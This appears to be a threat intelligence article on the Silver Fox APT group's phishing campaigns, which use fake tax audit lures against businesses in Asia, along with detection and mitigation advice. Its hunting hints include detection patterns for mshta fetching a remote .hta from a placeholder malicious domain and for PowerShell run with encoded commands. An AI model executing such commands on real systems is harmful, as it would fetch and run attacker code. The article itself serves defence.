Silver Fox APT Group Expands Operations, Targeting Asian Businesses with Fake Tax Audit Lures

China-Based Silver Fox APT Expands Espionage Campaign Across Asia with Fake Tax Audits

HIGH
April 29, 2026
5m read
Threat ActorCyberattackPhishing

Related Entities

Threat Actors

Silver Fox

Organizations

S2WNational Tax Bureau in Taiwan

Full Report

Executive Summary

The China-aligned threat group known as Silver Fox has significantly expanded the scope and sophistication of its operations, now targeting a wide range of businesses across Asia with dual-purpose espionage and financially motivated campaigns. According to research from S2W, the group, active since at least 2022, is leveraging highly localized social engineering lures, such as fake tax audit notifications impersonating Taiwan's National Tax Bureau. These phishing campaigns deliver malware designed to establish persistent access for data exfiltration. Initially focused on targets in China, Silver Fox has broadened its activities to include Japan, Taiwan, and several countries in Southeast Asia, with recent campaigns targeting corporate environments in the medical and financial sectors.

Threat Overview

Silver Fox has demonstrated a clear evolution in its targeting and methods. The group's operational timeline is as follows:

  • Phase 1 (2022-2024): Primarily financially motivated attacks targeting users within China.
  • Phase 2 (2024-2025): Expansion to espionage and financial attacks targeting Taiwan and Japan.
  • Phase 3 (2025-Present): Further expansion into Southeast Asia (Malaysia, Indonesia, Singapore, Thailand, Philippines) with a focus on corporate targets, including medical and financial institutions.

The current campaign uses carefully timed phishing emails that coincide with local tax seasons to increase their legitimacy. The emails contain malicious attachments, such as disguised shortcut (.lnk) files or Office documents with malicious macros, which act as droppers for second-stage payloads.

Technical Analysis

The attack chain observed in the latest Silver Fox campaign follows a common pattern for APT groups:

  1. Initial Access: A spearphishing email is sent to the target. The email is socially engineered to appear as an official communication, such as a tax audit notice. The attachment is a malicious LNK file or a macro-enabled Office document.
  2. Execution: The user is tricked into opening the attachment, which executes a script (e.g., PowerShell) to download the next stage payload.
  3. Payload Delivery: The second-stage payload is downloaded from a legitimate cloud storage service to evade network-based detection.
  4. Persistence and C2: A remote management tool or custom backdoor is installed on the victim's system. This provides the attackers with persistent access and a channel for command and control and data exfiltration.

MITRE ATT&CK Techniques

Impact Assessment

  • Espionage: For government, financial, and medical targets, the primary impact is the theft of sensitive strategic, economic, or personal data.
  • Financial Loss: The group's dual-purpose nature means some victims may be targeted for direct financial theft, either through stolen banking credentials or ransomware.
  • Long-Term Compromise: By installing remote access tools, Silver Fox can maintain a long-term presence in a victim's network, continuously exfiltrating data and monitoring communications.
  • Regional Destabilization: Targeted espionage against key sectors in multiple Asian countries can serve broader geopolitical goals.

IOCs — Directly from Articles

No specific Indicators of Compromise (IOCs) were provided in the source articles.

Cyber Observables — Hunting Hints

Security teams in the targeted regions should hunt for the following:

Type
command_line_pattern
Value
mshta.exe http://[malicious_domain]/payload.hta
Description
mshta.exe is often used to execute remote scripts. Look for it making network connections.
Type
file_name
Value
*.lnk
Description
Monitor for .lnk files being delivered via email or downloaded from the web, especially if they are large or have unusual icons.
Type
log_source
Value
Email Gateway Logs
Description
Search for emails with subjects related to 'tax audit' or 'software update' that contain attachments, especially from unknown senders.
Type
process_name
Value
powershell.exe -enc [base64_encoded_command]
Description
Look for PowerShell being launched with encoded commands, a common obfuscation technique.

Detection & Response

  • Detection:
    • Use email security gateways to scan for and block malicious attachments like LNK files and macro-enabled documents. D3FEND's File Analysis (D3-FA) is critical here.
    • Configure endpoint protection to block or alert on the execution of scripts from Office applications.
    • Monitor process creation logs for suspicious chains, such as WINWORD.EXE spawning powershell.exe.
  • Response:
    • If a phishing email is identified, ensure it is removed from all user inboxes.
    • If a machine is compromised, isolate it from the network immediately.
    • Conduct a forensic analysis to identify the backdoor used and search for its presence on other systems.
    • Block any identified C2 domains or IPs at the network perimeter.

Mitigation

  • User Training: Train employees, especially in targeted regions and sectors, to be suspicious of unsolicited emails, particularly those related to financial or administrative matters like tax audits. This aligns with D3FEND's User Training (D3-UT).
  • Attack Surface Reduction: Block LNK files at the email gateway. Disable macros for all Office files received from the internet via Group Policy.
  • Endpoint Hardening: Use Application Hardening (D3-AH) policies to restrict the ability of scripts like PowerShell and VBScript to execute unless they are signed by a trusted source.
  • Egress Filtering: Implement outbound traffic filtering to block connections to known malicious domains and restrict the protocols that can be used to communicate with the internet.

Timeline of Events

1
January 1, 2022
Silver Fox group begins activity, initially focusing on financially motivated attacks in China.
2
January 1, 2025
The group expands operations into Southeast Asia.
3
April 1, 2026
S2W analysts publish a profile on Silver Fox's updated tactics, including fake tax audit lures in Taiwan.
4
April 29, 2026
This article was published

MITRE ATT&CK Mitigations

Educate users to identify and report socially engineered phishing emails, especially those with a sense of urgency.

Block malicious attachments like LNK files at the email gateway and filter outbound traffic to block C2 communications.

Use application control policies to restrict the execution of unsigned scripts and macros from the internet.

D3FEND Defensive Countermeasures

To counter the initial access vector used by Silver Fox, organizations must implement robust file analysis at the email gateway. Configure email security solutions to block or quarantine potentially malicious file types that have few legitimate business uses as attachments, such as LNK files, VBS scripts, and ISO images. For allowed attachments like Office documents, they should be sandboxed and analyzed for malicious behavior (e.g., spawning a PowerShell process). This automated analysis can detect and stop the malicious dropper before it ever reaches a user's inbox, breaking the attack chain at the earliest stage.

Harden endpoints by configuring applications to be more secure by default. For Microsoft Office, use Group Policy to block all macros from files originating from the internet. For scripting languages like PowerShell, set the execution policy to 'RemoteSigned' or 'AllSigned' to prevent the execution of untrusted, unsigned scripts downloaded by the malware. Additionally, use Attack Surface Reduction (ASR) rules in Microsoft Defender to block common malicious behaviors, such as Office applications creating executable content or child processes, which would directly interfere with Silver Fox's TTPs.

Timeline of Events

1
January 1, 2022

Silver Fox group begins activity, initially focusing on financially motivated attacks in China.

2
January 1, 2025

The group expands operations into Southeast Asia.

3
April 1, 2026

S2W analysts publish a profile on Silver Fox's updated tactics, including fake tax audit lures in Taiwan.

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)

Tags

Silver FoxAPTChinaEspionagePhishingTax AuditAsiaThreat Actor

📢 Share This Article

Help others stay informed about cybersecurity threats

🎯 MITRE ATT&CK Mapped

Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.

🧠 Enriched & Analyzed

Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.

🛡️ Actionable Guidance

Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.

🔗 STIX Visualizer

Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.

Sigma Generator

Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.